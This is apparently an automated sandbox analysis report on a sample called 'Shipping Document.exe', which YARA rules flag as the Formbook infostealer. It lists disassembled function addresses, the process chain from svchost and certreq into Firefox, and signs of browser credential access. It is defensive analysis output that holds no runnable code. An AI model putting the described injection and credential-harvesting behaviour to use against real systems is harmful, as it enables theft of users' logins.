Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03040535 2_2_03040535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03100591 2_2_03100591
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030E4420 2_2_030E4420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030F2446 2_2_030F2446
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030EE4F6 2_2_030EE4F6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030FAB40 2_2_030FAB40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030F6BD7 2_2_030F6BD7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303EA80 2_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03056962 2_2_03056962
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030429A0 2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0310A9A6 2_2_0310A9A6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0304A840 2_2_0304A840
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03042840 2_2_03042840
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030268B8 2_2_030268B8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306E8F0 2_2_0306E8F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03082F28 2_2_03082F28
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03060F30 2_2_03060F30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030E2F30 2_2_030E2F30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B4F40 2_2_030B4F40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030BEFA0 2_2_030BEFA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03032FC8 2_2_03032FC8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0304CFE0 2_2_0304CFE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030FEE26 2_2_030FEE26
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03040E59 2_2_03040E59
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03052E90 2_2_03052E90
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030FCE93 2_2_030FCE93
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030FEEDB 2_2_030FEEDB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0304AD00 2_2_0304AD00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030DCD1F 2_2_030DCD1F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03058DBF 2_2_03058DBF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303ADE0 2_2_0303ADE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03040C00 2_2_03040C00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030E0CB5 2_2_030E0CB5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03030CF2 2_2_03030CF2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030F132D 2_2_030F132D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0302D34C 2_2_0302D34C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0308739A 2_2_0308739A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030452A0 2_2_030452A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0305B2C0 2_2_0305B2C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030E12ED 2_2_030E12ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0307516C 2_2_0307516C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0302F172 2_2_0302F172
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0310B16B 2_2_0310B16B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0304B1B0 2_2_0304B1B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030EF0CC 2_2_030EF0CC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030470C0 2_2_030470C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030F70E9 2_2_030F70E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030FF0E0 2_2_030FF0E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030FF7B0 2_2_030FF7B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03085630 2_2_03085630
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030F16CC 2_2_030F16CC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030F7571 2_2_030F7571
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030DD5B0 2_2_030DD5B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031095C3 2_2_031095C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030FF43F 2_2_030FF43F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03031460 2_2_03031460
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030FFB76 2_2_030FFB76
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0305FB80 2_2_0305FB80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B5BF0 2_2_030B5BF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0307DBF9 2_2_0307DBF9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030FFA49 2_2_030FFA49
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030F7A46 2_2_030F7A46
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B3A6C 2_2_030B3A6C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030DDAAC 2_2_030DDAAC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03085AA0 2_2_03085AA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030E1AA3 2_2_030E1AA3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030EDAC6 2_2_030EDAC6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030D5910 2_2_030D5910
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03049950 2_2_03049950
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0305B950 2_2_0305B950
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030AD800 2_2_030AD800
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030438E0 2_2_030438E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030FFF09 2_2_030FFF09
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03041F92 2_2_03041F92
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030FFFB1 2_2_030FFFB1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03003FD2 2_2_03003FD2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03003FD5 2_2_03003FD5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03049EB0 2_2_03049EB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03043D40 2_2_03043D40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030F1D5A 2_2_030F1D5A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030F7D73 2_2_030F7D73
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0305FDC0 2_2_0305FDC0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B9C32 2_2_030B9C32
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030FFCF2 2_2_030FFCF2
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_05607571 4_2_05607571
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_05550535 4_2_05550535
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_055ED5B0 4_2_055ED5B0
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_05610591 4_2_05610591
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_05602446 4_2_05602446
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_05541460 4_2_05541460
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_0560F43F 4_2_0560F43F
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_055FE4F6 4_2_055FE4F6
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_05574750 4_2_05574750
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_05550770 4_2_05550770
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_0554C7C0 4_2_0554C7C0
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_0560F7B0 4_2_0560F7B0
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_056016CC 4_2_056016CC
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_0556C6E0 4_2_0556C6E0
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_055D8158 4_2_055D8158
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_0561B16B 4_2_0561B16B
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_0553F172 4_2_0553F172
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_0558516C 4_2_0558516C
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_055EA118 4_2_055EA118
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_05540100 4_2_05540100
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_056081CC 4_2_056081CC
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_056101AA 4_2_056101AA
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_0555B1B0 4_2_0555B1B0
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_0560F0E0 4_2_0560F0E0
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_056070E9 4_2_056070E9
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_055FF0CC 4_2_055FF0CC
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_055570C0 4_2_055570C0
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_0553D34C 4_2_0553D34C
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_0560A352 4_2_0560A352
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_0560132D 4_2_0560132D
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_056103E6 4_2_056103E6
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_0555E3F0 4_2_0555E3F0
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_0559739A 4_2_0559739A
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_055F0274 4_2_055F0274
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_0556B2C0 4_2_0556B2C0
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_055D02C0 4_2_055D02C0
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_055F12ED 4_2_055F12ED
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_055552A0 4_2_055552A0
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_05607D73 4_2_05607D73
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_05553D40 4_2_05553D40
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_05601D5A 4_2_05601D5A
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_0555AD00 4_2_0555AD00
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_0556FDC0 4_2_0556FDC0
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_0554ADE0 4_2_0554ADE0
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_05568DBF 4_2_05568DBF
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_05550C00 4_2_05550C00
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_055C9C32 4_2_055C9C32
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_0560FCF2 4_2_0560FCF2
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_05540CF2 4_2_05540CF2
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_055F0CB5 4_2_055F0CB5
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_055C4F40 4_2_055C4F40
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_05570F30 4_2_05570F30
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_0560FF09 4_2_0560FF09
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_05592F28 4_2_05592F28
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_05542FC8 4_2_05542FC8
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_0555CFE0 4_2_0555CFE0
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_05551F92 4_2_05551F92
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_0560FFB1 4_2_0560FFB1
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_055CEFA0 4_2_055CEFA0
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_05550E59 4_2_05550E59
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_0560EE26 4_2_0560EE26
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_0560EEDB 4_2_0560EEDB
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_05562E90 4_2_05562E90
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_05559EB0 4_2_05559EB0
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_0560CE93 4_2_0560CE93
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_05559950 4_2_05559950
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_0556B950 4_2_0556B950
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_05566962 4_2_05566962
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_0561A9A6 4_2_0561A9A6
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_055529A0 4_2_055529A0
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_05552840 4_2_05552840
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_0555A840 4_2_0555A840
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_055BD800 4_2_055BD800
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_0557E8F0 4_2_0557E8F0
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_055538E0 4_2_055538E0
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_055368B8 4_2_055368B8
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_0560FB76 4_2_0560FB76
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_0560AB40 4_2_0560AB40
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_0558DBF9 4_2_0558DBF9
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_055C5BF0 4_2_055C5BF0
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_05606BD7 4_2_05606BD7
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_0556FB80 4_2_0556FB80
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_05607A46 4_2_05607A46
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_0560FA49 4_2_0560FA49
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_055C3A6C 4_2_055C3A6C
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_055FDAC6 4_2_055FDAC6
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_0554EA80 4_2_0554EA80
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_055EDAAC 4_2_055EDAAC
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_05595AA0 4_2_05595AA0
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_02F313A0 4_2_02F313A0
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_02F2C7D0 4_2_02F2C7D0
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_02F2C5B0 4_2_02F2C5B0
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_02F2A850 4_2_02F2A850
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_02F32EE0 4_2_02F32EE0
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_02F32EDB 4_2_02F32EDB
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_02F49DF0 4_2_02F49DF0
Source: C:\Users\user\Desktop\Shipping Document.exe Code function: String function: 00FE0D27 appears 70 times
Source: C:\Users\user\Desktop\Shipping Document.exe Code function: String function: 00FC7F41 appears 35 times
Source: C:\Users\user\Desktop\Shipping Document.exe Code function: String function: 00FE8B40 appears 42 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 030BF290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03075130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 030AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 0302B970 appears 277 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03087E54 appears 111 times
Source: C:\Windows\SysWOW64\certreq.exe Code function: String function: 055BEA12 appears 86 times
Source: C:\Windows\SysWOW64\certreq.exe Code function: String function: 05597E54 appears 98 times
Source: C:\Windows\SysWOW64\certreq.exe Code function: String function: 0553B970 appears 269 times
Source: C:\Windows\SysWOW64\certreq.exe Code function: String function: 055CF290 appears 105 times
Source: C:\Windows\SysWOW64\certreq.exe Code function: String function: 05585130 appears 36 times
Source: Shipping Document.exe, 00000001.00000003.1507169817.0000000003D9D000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Shipping Document.exe
Source: Shipping Document.exe, 00000001.00000003.1507813362.0000000003C43000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Shipping Document.exe
Source: Shipping Document.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.3984304736.0000000003650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.1669970223.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.3980970277.00000000033E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.1670104693.00000000027B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.3987001681.0000000005650000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.3977610628.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.3984522245.0000000005800000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.1670907930.0000000005B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/5@16/11
Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 1_2_0102A2D5 GetLastError,FormatMessageW, 1_2_0102A2D5
Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 1_2_01018713 AdjustTokenPrivileges,CloseHandle, 1_2_01018713
Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 1_2_01018CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 1_2_01018CC3
Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 1_2_0102B59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode, 1_2_0102B59E
Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 1_2_0103F121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle, 1_2_0103F121
Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 1_2_0102C602 CoInitialize,CoCreateInstance,CoUninitialize, 1_2_0102C602
Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 1_2_00FC4FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource, 1_2_00FC4FE9
Source: C:\Users\user\Desktop\Shipping Document.exe File created: C:\Users\user~1\AppData\Local\Temp\autA2D7.tmp Jump to behavior
Source: Shipping Document.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Program Files\Mozilla Firefox\firefox.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Users\user\Desktop\Shipping Document.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: certreq.exe, 00000004.00000003.1862755952.00000000034E9000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000004.00000002.3981081238.00000000034F4000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000004.00000002.3981081238.0000000003517000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000004.00000003.1862641741.00000000034C8000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000004.00000002.3981081238.00000000034E9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: Shipping Document.exe ReversingLabs: Detection: 54%
Source: Shipping Document.exe Virustotal: Detection: 36%
Source: unknown Process created: C:\Users\user\Desktop\Shipping Document.exe "C:\Users\user\Desktop\Shipping Document.exe"
Source: C:\Users\user\Desktop\Shipping Document.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Shipping Document.exe"
Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe Process created: C:\Windows\SysWOW64\certreq.exe "C:\Windows\SysWOW64\certreq.exe"
Source: C:\Windows\SysWOW64\certreq.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\Shipping Document.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Shipping Document.exe" Jump to behavior
Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe Process created: C:\Windows\SysWOW64\certreq.exe "C:\Windows\SysWOW64\certreq.exe" Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Source: C:\Users\user\Desktop\Shipping Document.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\Desktop\Shipping Document.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\Shipping Document.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\Shipping Document.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\Shipping Document.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\Shipping Document.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Shipping Document.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\Shipping Document.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\Shipping Document.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\Shipping Document.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\Shipping Document.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\Shipping Document.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe Section loaded: certcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe Section loaded: certca.dll Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe Section loaded: cryptsp.dll Jump to behavior
